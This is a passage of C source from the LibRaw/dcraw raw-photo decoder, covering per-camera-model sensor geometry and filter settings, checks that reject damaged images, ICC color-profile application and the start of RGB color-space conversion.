colors = 4;
filters = 0xe1e4e1e4;
load_raw = &CLASS canon_600_load_raw;
} else if (!strcmp(model,"PowerShot A5") ||
!strcmp(model,"PowerShot A5 Zoom")) {
height = 773;
width = 960;
raw_width = 992;
pixel_aspect = 256/235.0;
filters = 0x1e4e1e4e;
goto canon_a5;
} else if (!strcmp(model,"PowerShot A50")) {
height = 968;
width = 1290;
raw_width = 1320;
filters = 0x1b4e4b1e;
goto canon_a5;
} else if (!strcmp(model,"PowerShot Pro70")) {
height = 1024;
width = 1552;
filters = 0x1e4b4e1b;
canon_a5:
colors = 4;
tiff_bps = 10;
load_raw = &CLASS packed_load_raw;
load_flags = 40;
} else if (!strcmp(model,"PowerShot Pro90 IS") ||
!strcmp(model,"PowerShot G1")) {
colors = 4;
filters = 0xb4b4b4b4;
} else if (!strcmp(model,"PowerShot A610")) {
if (canon_s2is()) strcpy (model+10, "S2 IS");
} else if (!strcmp(model,"PowerShot SX220 HS")) {
mask[1][3] = -4;
top_margin=16;
left_margin = 92;
} else if (!strcmp(model,"PowerShot S120")) {
raw_width = 4192;
raw_height = 3062;
width = 4022;
height = 3016;
mask[0][0] = top_margin = 31;
mask[0][2] = top_margin + height;
left_margin = 120;
mask[0][1] = 23;
mask[0][3] = 72;
} else if (!strcmp(model,"PowerShot G16")) {
mask[0][0] = 0;
mask[0][2] = 80;
mask[0][1] = 0;
mask[0][3] = 16;
top_margin = 29;
left_margin = 120;
width = raw_width-left_margin-48;
height = raw_height-top_margin-14;
} else if (!strcmp(model,"PowerShot SX50 HS")) {
top_margin = 17;
} else if (!strcmp(model,"EOS D2000C")) {
filters = 0x61616161;
black = curve[200];
} else if (!strcmp(model,"D1")) {
cam_mul[0] *= 256/527.0;
cam_mul[2] *= 256/317.0;
} else if (!strcmp(model,"D1X")) {
width -= 4;
pixel_aspect = 0.5;
} else if (!strcmp(model,"D40X") ||
!strcmp(model,"D60") ||
!strcmp(model,"D80") ||
!strcmp(model,"D3000")) {
height -= 3;
width -= 4;
} else if (!strcmp(model,"D3") ||
!strcmp(model,"D3S") ||
!strcmp(model,"D700")) {
width -= 4;
left_margin = 2;
} else if (!strcmp(model,"D3100")) {
width -= 28;
left_margin = 6;
} else if (!strcmp(model,"D5000") ||
!strcmp(model,"D90")) {
width -= 42;
} else if (!strcmp(model,"D5100") ||
!strcmp(model,"D7000") ||
!strcmp(model,"COOLPIX A")) {
width -= 44;
} else if (!strcmp(model,"D3200") ||
!strncmp(model,"D6",2) ||
!strncmp(model,"D800",4)) {
width -= 46;
} else if (!strcmp(model,"D4") ||
!strcmp(model,"Df")) {
width -= 52;
left_margin = 2;
} else if (!strncmp(model,"D40",3) ||
!strncmp(model,"D50",3) ||
!strncmp(model,"D70",3)) {
width--;
} else if (!strcmp(model,"D100")) {
if (load_flags)
raw_width = (width += 3) + 3;
} else if (!strcmp(model,"D200")) {
left_margin = 1;
width -= 4;
filters = 0x94949494;
} else if (!strncmp(model,"D2H",3)) {
left_margin = 6;
width -= 14;
} else if (!strncmp(model,"D2X",3)) {
if (width == 3264) width -= 32;
else width -= 8;
} else if (!strncmp(model,"D300",4)) {
width -= 32;
} else if (!strncmp(make,"Nikon",5) && raw_width == 4032) {
if(!strcmp(model,"COOLPIX P7700"))
{
adobe_coeff ("Nikon","COOLPIX P7700");
maximum = 65504;
load_flags = 0;
}
else if(!strcmp(model,"COOLPIX P7800"))
{
adobe_coeff ("Nikon","COOLPIX P7800");
maximum = 65504;
load_flags = 0;
}
else if(!strcmp(model,"COOLPIX P340"))
load_flags=0;
} else if (!strncmp(model,"COOLPIX P",9) && raw_width != 4032) {
load_flags = 24;
filters = 0x94949494;
if (model[9] == '7' && (iso_speed >= 400 || iso_speed==0) && !strstr(software,"V1.2") )
black = 255;
} else if (!strncmp(model,"1 ",2)) {
height -= 2;
} else if (fsize == 1581060) {
simple_coeff(3);
pre_mul[0] = 1.2085;
pre_mul[1] = 1.0943;
pre_mul[3] = 1.1103;
} else if (fsize == 3178560) {
cam_mul[0] *= 4;
cam_mul[2] *= 4;
} else if (fsize == 4771840) {
if (!timestamp && nikon_e995())
strcpy (model, "E995");
if (strcmp(model,"E995")) {
filters = 0xb4b4b4b4;
simple_coeff(3);
pre_mul[0] = 1.196;
pre_mul[1] = 1.246;
pre_mul[2] = 1.018;
}
} else if (fsize == 2940928) {
if (!timestamp && !nikon_e2100())
strcpy (model,"E2500");
if (!strcmp(model,"E2500")) {
height -= 2;
load_flags = 6;
colors = 4;
filters = 0x4b4b4b4b;
}
} else if (fsize == 4775936) {
if (!timestamp) nikon_3700();
if (model[0] == 'E' && atoi(model+1) < 3700)
filters = 0x49494949;
if (!strcmp(model,"Optio 33WR")) {
flip = 1;
filters = 0x16161616;
}
if (make[0] == 'O') {
i = find_green (12, 32, 1188864, 3576832);
c = find_green (12, 32, 2383920, 2387016);
if (abs(i) < abs(c)) {
SWAP(i,c);
load_flags = 24;
}
if (i < 0) filters = 0x61616161;
}
} else if (fsize == 5869568) {
if (!timestamp && minolta_z2()) {
strcpy (make, "Minolta");
strcpy (model,"DiMAGE Z2");
}
load_flags = 6 + 24*(make[0] == 'M');
} else if (fsize == 6291456) {
fseek (ifp, 0x300000, SEEK_SET);
if ((order = guess_byte_order(0x10000)) == 0x4d4d) {
height -= (top_margin = 16);
width -= (left_margin = 28);
maximum = 0xf5c0;
strcpy (make, "ISG");
model[0] = 0;
}
} else if (!strncmp(make,"Fujifilm",8)) {
if (!strcmp(model+7,"S2Pro")) {
strcpy (model,"S2Pro");
height = 2144;
width = 2880;
flip = 6;
} else if (load_raw != &CLASS packed_load_raw)
maximum = (is_raw == 2 && shot_select) ? 0x2f00 : 0x3e00;
top_margin = (raw_height - height) >> 2 << 1;
left_margin = (raw_width - width ) >> 2 << 1;
if (width == 2848 || width == 3664) filters = 0x16161616;
if (width == 4032 || width == 4952) left_margin = 0;
if (width == 3328 && (width -= 66)) left_margin = 34;
if (width == 4936) left_margin = 4;
if (width == 6032) left_margin = 0;
if (!strcmp(model,"HS50EXR") ||
!strcmp(model,"F900EXR")) {
width += 2;
left_margin = 0;
filters = 0x16161616;
}
if(!strcmp(model,"S5500"))
{
height -= (top_margin=6);
}
if (fuji_layout) raw_width *= is_raw;
if (filters == 9)
FORC(36) ((char *)xtrans)[c] =
xtrans_abs[(c/6+top_margin) % 6][(c+left_margin) % 6];
} else if (!strcmp(model,"KD-400Z")) {
height = 1712;
width = 2312;
raw_width = 2336;
goto konica_400z;
} else if (!strcmp(model,"KD-510Z")) {
goto konica_510z;
} else if (!strncasecmp(make,"Minolta",7)) {
if (!load_raw && (maximum = 0xfff))
load_raw = &CLASS unpacked_load_raw;
if (!strncmp(model,"DiMAGE A",8)) {
if (!strcmp(model,"DiMAGE A200"))
filters = 0x49494949;
tiff_bps = 12;
load_raw = &CLASS packed_load_raw;
} else if (!strncmp(model,"ALPHA",5) ||
!strncmp(model,"DYNAX",5) ||
!strncmp(model,"MAXXUM",6)) {
sprintf (model+20, "DYNAX %-10s", model+6+(model[0]=='M'));
adobe_coeff (make, model+20);
load_raw = &CLASS packed_load_raw;
} else if (!strncmp(model,"DiMAGE G",8)) {
if (model[8] == '4') {
height = 1716;
width = 2304;
} else if (model[8] == '5') {
konica_510z:
height = 1956;
width = 2607;
raw_width = 2624;
} else if (model[8] == '6') {
height = 2136;
width = 2848;
}
data_offset += 14;
filters = 0x61616161;
konica_400z:
load_raw = &CLASS unpacked_load_raw;
maximum = 0x3df;
order = 0x4d4d;
}
} else if (!strcmp(model,"*ist D")) {
load_raw = &CLASS unpacked_load_raw;
data_error = -1;
} else if (!strcmp(model,"*ist DS")) {
height -= 2;
} else if (!strncmp(make,"Samsung",7) && raw_width == 4704) {
height -= top_margin = 8;
width -= 2 * (left_margin = 8);
load_flags = 32;
} else if (!strncmp(make,"Samsung",7) && !strcmp(model,"NX3000")) {
top_margin = 24;
left_margin = 64;
width = 5472;
height = 3648;
filters = 0x61616161;
colors = 3;
} else if (!strncmp(make,"Samsung",7) && raw_height == 3714) {
height -= top_margin = 18;
left_margin = raw_width - (width = 5536);
if (raw_width != 5600)
left_margin = top_margin = 0;
filters = 0x61616161;
colors = 3;
} else if (!strncmp(make,"Samsung",7) && raw_width == 5632) {
order = 0x4949;
height = 3694;
top_margin = 2;
width = 5574 - (left_margin = 32 + tiff_bps);
if (tiff_bps == 12) load_flags = 80;
} else if (!strncmp(make,"Samsung",7) && raw_width == 5664) {
height -= top_margin = 17;
left_margin = 96;
width = 5544;
filters = 0x49494949;
} else if (!strncmp(make,"Samsung",7) && raw_width == 6496) {
filters = 0x61616161;
#ifdef LIBRAW_LIBRARY_BUILD
if(!black && !cblack[0] && !cblack[1] && !cblack[2] && !cblack[3])
#endif
black = 1 << (tiff_bps - 7);
} else if (!strcmp(model,"EX1")) {
order = 0x4949;
height -= 20;
top_margin = 2;
if ((width -= 6) > 3682) {
height -= 10;
width -= 46;
top_margin = 8;
}
} else if (!strcmp(model,"WB2000")) {
order = 0x4949;
height -= 3;
top_margin = 2;
if ((width -= 10) > 3718) {
height -= 28;
width -= 56;
top_margin = 8;
}
} else if (strstr(model,"WB550")) {
strcpy (model, "WB550");
} else if (!strcmp(model,"EX2F")) {
height = 3030;
width = 4040;
top_margin = 15;
left_margin=24;
order = 0x4949;
filters = 0x49494949;
load_raw = &CLASS unpacked_load_raw;
} else if (!strcmp(model,"STV680 VGA")) {
black = 16;
} else if (!strcmp(model,"N95")) {
height = raw_height - (top_margin = 2);
} else if (!strcmp(model,"640x480")) {
gamma_curve (0.45, 4.5, 1, 255);
} else if (!strncmp(make,"Hasselblad",10)) {
if (load_raw == &CLASS lossless_jpeg_load_raw)
load_raw = &CLASS hasselblad_load_raw;
if (raw_width == 7262) {
height = 5444;
width = 7248;
top_margin = 4;
left_margin = 7;
filters = 0x61616161;
if(!strncasecmp(model,"H3D",3))
{
adobe_coeff("Hasselblad","H3DII-39");
strcpy(model,"H3DII-39");
}
} else if (raw_width == 7410 || raw_width == 8282) {
height -= 84;
width -= 82;
top_margin = 4;
left_margin = 41;
filters = 0x61616161;
adobe_coeff("Hasselblad","H4D-40");
strcpy(model,"H4D-40");
}
else if( raw_width == 8384) // X1D
{
top_margin = 96;
height -= 96;
left_margin = 48;
width -= 106;
adobe_coeff("Hasselblad","X1D");
}
else if (raw_width == 9044) {
if(black > 500)
{
top_margin = 12;
left_margin = 44;
width = 8956;
height = 6708;
memset(cblack,0,sizeof(cblack));
adobe_coeff("Hasselblad","H4D-60");
strcpy(model,"H4D-60");
black = 512;
}
else
{
height = 6716;
width = 8964;
top_margin = 8;
left_margin = 40;
black += load_flags = 256;
maximum = 0x8101;
strcpy(model,"H3DII-60");
}
} else if (raw_width == 4090) {
strcpy (model, "V96C");
height -= (top_margin = 6);
width -= (left_margin = 3) + 7;
filters = 0x61616161;
} else if (raw_width == 8282 && raw_height == 6240) {
if(!strncasecmp(model,"H5D",3))
{
/* H5D 50*/
left_margin = 54;
top_margin = 16;
width = 8176;
height = 6132;
black = 256;
strcpy(model,"H5D-50");
}
else if(!strncasecmp(model,"H3D",3))
{
black=0;
left_margin = 54;
top_margin = 16;
width = 8176;
height = 6132;
memset(cblack,0,sizeof(cblack));
adobe_coeff("Hasselblad","H3D-50");
strcpy(model,"H3D-50");
}
} else if (raw_width == 8374 && raw_height == 6304) {
/* H5D 50c*/
left_margin = 52;
top_margin = 100;
width = 8272;
height = 6200;
black = 256;
strcpy(model,"H5D-50c");
}
if (tiff_samples > 1) {
is_raw = tiff_samples+1;
if (!shot_select && !half_size) filters = 0;
}
} else if (!strncmp(make,"Sinar",5)) {
if (!load_raw) load_raw = &CLASS unpacked_load_raw;
if (is_raw > 1 && !shot_select && !half_size) filters = 0;
maximum = 0x3fff;
} else if (!strncmp(make,"Leaf",4)) {
maximum = 0x3fff;
fseek (ifp, data_offset, SEEK_SET);
if (ljpeg_start (&jh, 1) && jh.bits == 15)
maximum = 0x1fff;
if (tiff_samples > 1) filters = 0;
if (tiff_samples > 1 || tile_length < raw_height) {
load_raw = &CLASS leaf_hdr_load_raw;
raw_width = tile_width;
}
if ((width | height) == 2048) {
if (tiff_samples == 1) {
filters = 1;
strcpy (cdesc, "RBTG");
strcpy (model, "CatchLight");
top_margin = 8; left_margin = 18; height = 2032; width = 2016;
} else {
strcpy (model, "DCB2");
top_margin = 10; left_margin = 16; height = 2028; width = 2022;
}
} else if (width+height == 3144+2060) {
if (!model[0]) strcpy (model, "Cantare");
if (width > height) {
top_margin = 6; left_margin = 32; height = 2048; width = 3072;
filters = 0x61616161;
} else {
left_margin = 6; top_margin = 32; width = 2048; height = 3072;
filters = 0x16161616;
}
if (!cam_mul[0] || model[0] == 'V') filters = 0;
else is_raw = tiff_samples;
} else if (width == 2116) {
strcpy (model, "Valeo 6");
height -= 2 * (top_margin = 30);
width -= 2 * (left_margin = 55);
filters = 0x49494949;
} else if (width == 3171) {
strcpy (model, "Valeo 6");
height -= 2 * (top_margin = 24);
width -= 2 * (left_margin = 24);
filters = 0x16161616;
}
} else if (!strncmp(make,"Leica",5) || !strncmp(make,"Panasonic",9)
|| !strncasecmp(make,"YUNEEC",6)) {
if (raw_width > 0&& ((flen - data_offset) / (raw_width*8/7) == raw_height) )
load_raw = &CLASS panasonic_load_raw;
if (!load_raw) {
load_raw = &CLASS unpacked_load_raw;
load_flags = 4;
}
zero_is_bad = 1;
if ((height += 12) > raw_height) height = raw_height;
for (i=0; i < sizeof pana / sizeof *pana; i++)
if (raw_width == pana[i][0] && raw_height == pana[i][1]) {
left_margin = pana[i][2];
top_margin = pana[i][3];
width += pana[i][4];
height += pana[i][5];
}
filters = 0x01010101 * (uchar) "\x94\x61\x49\x16"
[((filters-1) ^ (left_margin & 1) ^ (top_margin << 1)) & 3];
} else if (!strcmp(model,"C770UZ")) {
height = 1718;
width = 2304;
filters = 0x16161616;
load_raw = &CLASS packed_load_raw;
load_flags = 30;
} else if (!strncmp(make,"Olympus",7)) {
height += height & 1;
if (exif_cfa) filters = exif_cfa;
if (width == 4100) width -= 4;
if (width == 4080) width -= 24;
if (width == 9280) { width -= 6; height -= 6; }
if (load_raw == &CLASS unpacked_load_raw)
load_flags = 4;
tiff_bps = 12;
if (!strcmp(model,"E-300") ||
!strcmp(model,"E-500")) {
width -= 20;
if (load_raw == &CLASS unpacked_load_raw) {
maximum = 0xfc3;
memset (cblack, 0, sizeof cblack);
}
} else if (!strcmp(model,"STYLUS1")) {
width -= 14;
maximum = 0xfff;
} else if (!strcmp(model,"E-330")) {
width -= 30;
if (load_raw == &CLASS unpacked_load_raw)
maximum = 0xf79;
} else if (!strcmp(model,"SP550UZ")) {
thumb_length = flen - (thumb_offset = 0xa39800);
thumb_height = 480;
thumb_width = 640;
} else if (!strcmp(model,"TG-4")) {
width -= 16;
}
} else if (!strcmp(model,"N Digital")) {
height = 2047;
width = 3072;
filters = 0x61616161;
data_offset = 0x1a00;
load_raw = &CLASS packed_load_raw;
} else if (!strcmp(model,"DSC-F828")) {
width = 3288;
left_margin = 5;
mask[1][3] = -17;
data_offset = 862144;
load_raw = &CLASS sony_load_raw;
filters = 0x9c9c9c9c;
colors = 4;
strcpy (cdesc, "RGBE");
} else if (!strcmp(model,"DSC-V3")) {
width = 3109;
left_margin = 59;
mask[0][1] = 9;
data_offset = 787392;
load_raw = &CLASS sony_load_raw;
} else if (!strncmp(make,"Sony",4) && raw_width == 3984) {
width = 3925;
order = 0x4d4d;
} else if (!strncmp(make,"Sony",4) && raw_width == 4288) {
width -= 32;
} else if (!strcmp(make, "Sony") && raw_width == 4600) {
if (!strcmp(model, "DSLR-A350"))
height -= 4;
black = 0;
} else if (!strncmp(make,"Sony",4) && raw_width == 4928) {
if (height < 3280) width -= 8;
} else if (!strncmp(make,"Sony",4) && raw_width == 5504) { // ILCE-3000//5000
width -= height > 3664 ? 8 : 32;
} else if (!strncmp(make,"Sony",4) && raw_width == 6048) {
width -= 24;
if (strstr(model,"RX1") || strstr(model,"A99"))
width -= 6;
} else if (!strncmp(make,"Sony",4) && raw_width == 7392) {
width -= 30;
} else if (!strncmp(make,"Sony",4) && raw_width == 8000) {
width -= 32;
if (!strncmp(model, "DSC", 3)) {
tiff_bps = 14;
load_raw = &CLASS unpacked_load_raw;
}
} else if (!strcmp(model,"DSLR-A100")) {
if (width == 3880) {
height--;
width = ++raw_width;
} else {
height -= 4;
width -= 4;
order = 0x4d4d;
load_flags = 2;
}
filters = 0x61616161;
} else if (!strcmp(model,"PIXL")) {
height -= top_margin = 4;
width -= left_margin = 32;
gamma_curve (0, 7, 1, 255);
} else if (!strcmp(model,"C603") || !strcmp(model,"C330")
|| !strcmp(model,"12MP")) {
order = 0x4949;
if (filters && data_offset) {
fseek (ifp, data_offset < 4096 ? 168 : 5252, SEEK_SET);
read_shorts (curve, 256);
} else gamma_curve (0, 3.875, 1, 255);
load_raw = filters ? &CLASS eight_bit_load_raw :
strcmp(model,"C330") ? &CLASS kodak_c603_load_raw :
&CLASS kodak_c330_load_raw;
load_flags = tiff_bps > 16;
tiff_bps = 8;
} else if (!strncasecmp(model,"EasyShare",9)) {
data_offset = data_offset < 0x15000 ? 0x15000 : 0x17000;
load_raw = &CLASS packed_load_raw;
} else if (!strncasecmp(make,"Kodak",5)) {
if (filters == UINT_MAX) filters = 0x61616161;
if (!strncmp(model,"NC2000",6) ||
!strncmp(model,"EOSDCS",6) ||
!strncmp(model,"DCS4",4)) {
width -= 4;
left_margin = 2;
if (model[6] == ' ') model[6] = 0;
if (!strcmp(model,"DCS460A")) goto bw;
} else if (!strcmp(model,"DCS660M")) {
black = 214;
goto bw;
} else if (!strcmp(model,"DCS760M")) {
bw: colors = 1;
filters = 0;
}
if (!strcmp(model+4,"20X"))
strcpy (cdesc, "MYCY");
if (strstr(model,"DC25")) {
strcpy (model, "DC25");
data_offset = 15424;
}
if (!strncmp(model,"DC2",3)) {
raw_height = 2 + (height = 242);
if (!strncmp(model, "DC290", 5))
iso_speed = 100;
if (!strncmp(model, "DC280", 5))
iso_speed = 70;
if (flen < 100000) {
raw_width = 256; width = 249;
pixel_aspect = (4.0*height) / (3.0*width);
} else {
raw_width = 512; width = 501;
pixel_aspect = (493.0*height) / (373.0*width);
}
top_margin = left_margin = 1;
colors = 4;
filters = 0x8d8d8d8d;
simple_coeff(1);
pre_mul[1] = 1.179;
pre_mul[2] = 1.209;
pre_mul[3] = 1.036;
load_raw = &CLASS eight_bit_load_raw;
} else if (!strcmp(model,"40")) {
strcpy (model, "DC40");
height = 512;
width = 768;
data_offset = 1152;
load_raw = &CLASS kodak_radc_load_raw;
tiff_bps = 12;
} else if (strstr(model,"DC50")) {
strcpy (model, "DC50");
height = 512;
width = 768;
iso_speed=84;
data_offset = 19712;
load_raw = &CLASS kodak_radc_load_raw;
} else if (strstr(model,"DC120")) {
strcpy (model, "DC120");
height = 976;
width = 848;
iso_speed=160;
pixel_aspect = height/0.75/width;
load_raw = tiff_compress == 7 ?
&CLASS kodak_jpeg_load_raw : &CLASS kodak_dc120_load_raw;
} else if (!strcmp(model,"DCS200")) {
thumb_height = 128;
thumb_width = 192;
thumb_offset = 6144;
thumb_misc = 360;
iso_speed=140;
write_thumb = &CLASS layer_thumb;
black = 17;
}
} else if (!strcmp(model,"Fotoman Pixtura")) {
height = 512;
width = 768;
data_offset = 3632;
load_raw = &CLASS kodak_radc_load_raw;
filters = 0x61616161;
simple_coeff(2);
} else if (!strncmp(model,"QuickTake",9)) {
if (head[5]) strcpy (model+10, "200");
fseek (ifp, 544, SEEK_SET);
height = get2();
width = get2();
data_offset = (get4(),get2()) == 30 ? 738:736;
if (height > width) {
SWAP(height,width);
fseek (ifp, data_offset-6, SEEK_SET);
flip = ~get2() & 3 ? 5:6;
}
filters = 0x61616161;
} else if (!strncmp(make,"Rollei",6) && !load_raw) {
switch (raw_width) {
case 1316:
height = 1030;
width = 1300;
top_margin = 1;
left_margin = 6;
break;
case 2568:
height = 1960;
width = 2560;
top_margin = 2;
left_margin = 8;
}
filters = 0x16161616;
load_raw = &CLASS rollei_load_raw;
}
else if (!strcmp(model,"GRAS-50S5C")) {
height = 2048;
width = 2440;
load_raw = &CLASS unpacked_load_raw;
data_offset = 0;
filters = 0x49494949;
order = 0x4949;
maximum = 0xfffC;
} else if (!strcmp(model,"BB-500CL")) {
height = 2058;
width = 2448;
load_raw = &CLASS unpacked_load_raw;
data_offset = 0;
filters = 0x94949494;
order = 0x4949;
maximum = 0x3fff;
} else if (!strcmp(model,"BB-500GE")) {
height = 2058;
width = 2456;
load_raw = &CLASS unpacked_load_raw;
data_offset = 0;
filters = 0x94949494;
order = 0x4949;
maximum = 0x3fff;
} else if (!strcmp(model,"SVS625CL")) {
height = 2050;
width = 2448;
load_raw = &CLASS unpacked_load_raw;
data_offset = 0;
filters = 0x94949494;
order = 0x4949;
maximum = 0x0fff;
}
/* Early reject for damaged images */
if (!load_raw || height < 22 || width < 22 ||
#ifdef LIBRAW_LIBRARY_BUILD
(tiff_bps > 16 && load_raw != &LibRaw::deflate_dng_load_raw)
#else
tiff_bps > 16
#endif
|| tiff_samples > 4 || colors > 4 || colors < 1
/* alloc in unpack() may be fooled by size adjust */
|| ( (int)width + (int)left_margin > 65535)
|| ( (int)height + (int)top_margin > 65535)
)
{
is_raw = 0;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_IDENTIFY,1,2);
#endif
return;
}
if (!model[0])
sprintf (model, "%dx%d", width, height);
if (filters == UINT_MAX) filters = 0x94949494;
if (thumb_offset && !thumb_height) {
fseek (ifp, thumb_offset, SEEK_SET);
if (ljpeg_start (&jh, 1)) {
thumb_width = jh.wide;
thumb_height = jh.high;
}
}
dng_skip:
#ifdef LIBRAW_LIBRARY_BUILD
if(dng_version) /* Override black level by DNG tags */
{
black = imgdata.color.dng_levels.dng_black;
int ll = LIM(0,
(sizeof(cblack)/sizeof(cblack[0])),
(sizeof(imgdata.color.dng_levels.dng_cblack)/sizeof(imgdata.color.dng_levels.dng_cblack[0])));
for(int i=0; i < ll; i++)
cblack[i] = imgdata.color.dng_levels.dng_cblack[i];
}
#endif
/* Early reject for damaged images */
if (!load_raw || height < 22 || width < 22 ||
#ifdef LIBRAW_LIBRARY_BUILD
(tiff_bps > 16 && load_raw != &LibRaw::deflate_dng_load_raw)
#else
tiff_bps > 16
#endif
|| tiff_samples > 4 || colors > 4 || colors < 1)
{
is_raw = 0;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_IDENTIFY,1,2);
#endif
return;
}
if ((use_camera_matrix & ((use_camera_wb || dng_version) | 0x2) )
&& cmatrix[0][0] > 0.125) {
memcpy (rgb_cam, cmatrix, sizeof cmatrix);
raw_color = 0;
}
if (raw_color) adobe_coeff (make, model);
#ifdef LIBRAW_LIBRARY_BUILD
else if(imgdata.color.cam_xyz[0][0]<0.01)
adobe_coeff (make, model,1);
#endif
if (load_raw == &CLASS kodak_radc_load_raw)
if (raw_color) adobe_coeff ("Apple","Quicktake");
#ifdef LIBRAW_LIBRARY_BUILD
// Clear erorneus fuji_width if not set through parse_fuji or for DNG
if(fuji_width && !dng_version && !(imgdata.process_warnings & LIBRAW_WARN_PARSEFUJI_PROCESSED ))
fuji_width = 0;
#endif
if (fuji_width)
{
fuji_width = width >> !fuji_layout;
filters = fuji_width & 1 ? 0x94949494 : 0x49494949;
width = (height >> fuji_layout) + fuji_width;
height = width - 1;
pixel_aspect = 1;
} else {
if (raw_height < height) raw_height = height;
if (raw_width < width ) raw_width = width;
}
if (!tiff_bps) tiff_bps = 12;
if (!maximum)
{
maximum = (1 << tiff_bps) - 1;
if(maximum < 0x10000 && curve[maximum]>0 && load_raw == &CLASS sony_arw2_load_raw)
maximum = curve[maximum];
}
if (!load_raw || height < 22 || width < 22 ||
#ifdef LIBRAW_LIBRARY_BUILD
(tiff_bps > 16 && load_raw != &LibRaw::deflate_dng_load_raw)
#else
tiff_bps > 16
#endif
|| tiff_samples > 6 || colors > 4)
is_raw = 0;
if(raw_width < 22 || raw_width > 64000 || raw_height < 22 || raw_width > 64000)
is_raw = 0;
#ifdef NO_JASPER
if (load_raw == &CLASS redcine_load_raw) {
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s: You must link dcraw with %s!!\n"),
ifname, "libjasper");
#endif
is_raw = 0;
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_NO_JASPER;
#endif
}
#endif
#ifdef NO_JPEG
if (load_raw == &CLASS kodak_jpeg_load_raw ||
load_raw == &CLASS lossy_dng_load_raw) {
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s: You must link dcraw with %s!!\n"),
ifname, "libjpeg");
#endif
is_raw = 0;
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_NO_JPEGLIB;
#endif
}
#endif
if (!cdesc[0])
strcpy (cdesc, colors == 3 ? "RGBG":"GMCY");
if (!raw_height) raw_height = height;
if (!raw_width ) raw_width = width;
if (filters > 999 && colors == 3)
filters |= ((filters >> 2 & 0x22222222) |
(filters << 2 & 0x88888888)) & filters << 1;
notraw:
if (flip == UINT_MAX) flip = tiff_flip;
if (flip == UINT_MAX) flip = 0;
// Convert from degrees to bit-field if needed
if(flip > 89 || flip < -89)
{
switch ((flip+3600) % 360)
{
case 270: flip = 5; break;
case 180: flip = 3; break;
case 90: flip = 6; break;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_IDENTIFY,1,2);
#endif
}
//@end COMMON
//@out FILEIO
#ifndef NO_LCMS
void CLASS apply_profile (const char *input, const char *output)
{
char *prof;
cmsHPROFILE hInProfile=0, hOutProfile=0;
cmsHTRANSFORM hTransform;
FILE *fp;
unsigned size;
if (strcmp (input, "embed"))
hInProfile = cmsOpenProfileFromFile (input, "r");
else if (profile_length) {
#ifndef LIBRAW_LIBRARY_BUILD
prof = (char *) malloc (profile_length);
merror (prof, "apply_profile()");
fseek (ifp, profile_offset, SEEK_SET);
fread (prof, 1, profile_length, ifp);
hInProfile = cmsOpenProfileFromMem (prof, profile_length);
free (prof);
#else
hInProfile = cmsOpenProfileFromMem (imgdata.color.profile, profile_length);
#endif
} else
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_NO_EMBEDDED_PROFILE;
#endif
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s has no embedded profile.\n"), ifname);
#endif
}
if (!hInProfile)
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_NO_INPUT_PROFILE;
#endif
return;
}
if (!output)
hOutProfile = cmsCreate_sRGBProfile();
else if ((fp = fopen (output, "rb"))) {
fread (&size, 4, 1, fp);
fseek (fp, 0, SEEK_SET);
oprof = (unsigned *) malloc (size = ntohl(size));
merror (oprof, "apply_profile()");
fread (oprof, 1, size, fp);
fclose (fp);
if (!(hOutProfile = cmsOpenProfileFromMem (oprof, size))) {
free (oprof);
oprof = 0;
}
}
#ifdef DCRAW_VERBOSE
else
fprintf (stderr,_("Cannot open file %s!\n"), output);
#endif
if (!hOutProfile)
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_BAD_OUTPUT_PROFILE;
#endif
goto quit;
}
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("Applying color profile...\n"));
#endif
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_APPLY_PROFILE,0,2);
#endif
hTransform = cmsCreateTransform (hInProfile, TYPE_RGBA_16,
hOutProfile, TYPE_RGBA_16, INTENT_PERCEPTUAL, 0);
cmsDoTransform (hTransform, image, image, width*height);
raw_color = 1; /* Don't use rgb_cam with a profile */
cmsDeleteTransform (hTransform);
cmsCloseProfile (hOutProfile);
quit:
cmsCloseProfile (hInProfile);
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_APPLY_PROFILE,1,2);
#endif
}
#endif
//@end FILEIO
//@out COMMON
void CLASS convert_to_rgb()
{
#ifndef LIBRAW_LIBRARY_BUILD
int row, col, c;
#endif
int i, j, k;
#ifndef LIBRAW_LIBRARY_BUILD
ushort *img;
float out[3];
#endif
float out_cam[3][4];
double num, inverse[3][3];
static const double xyzd50_srgb[3][3] =
{ { 0.436083, 0.385083, 0.143055 },
{ 0.222507, 0.716888, 0.060608 },
{ 0.013930, 0.097097, 0.714022 } };
static const double rgb_rgb[3][3] =
{ { 1,0,0 }, { 0,1,0 }, { 0,0,1 } };
static const double adobe_rgb[3][3] =
{ { 0.715146, 0.284856, 0.000000 },
{ 0.000000, 1.000000, 0.000000 },
{ 0.000000, 0.041166, 0.958839 } };
static const double wide_rgb[3][3] =
{ { 0.593087, 0.404710, 0.002206 },
{ 0.095413, 0.843149, 0.061439 },
{ 0.011621, 0.069091, 0.919288 } };
static const double prophoto_rgb[3][3] =
{ { 0.529317, 0.330092, 0.140588 },
{ 0.098368, 0.873465, 0.028169 },
{ 0.016879, 0.117663, 0.865457 } };
static const double aces_rgb[3][3] =
{ { 0.432996, 0.375380, 0.189317 },
{ 0.089427, 0.816523, 0.102989 },
{ 0.019165, 0.118150, 0.941914 } };
static const double (*out_rgb[])[3] =
{ rgb_rgb, adobe_rgb, wide_rgb, prophoto_rgb, xyz_rgb, aces_rgb };
static const char *name[] =
{ "sRGB", "Adobe RGB (1998)", "WideGamut D65", "ProPhoto D65", "XYZ", "ACES" };
static const unsigned phead[] =
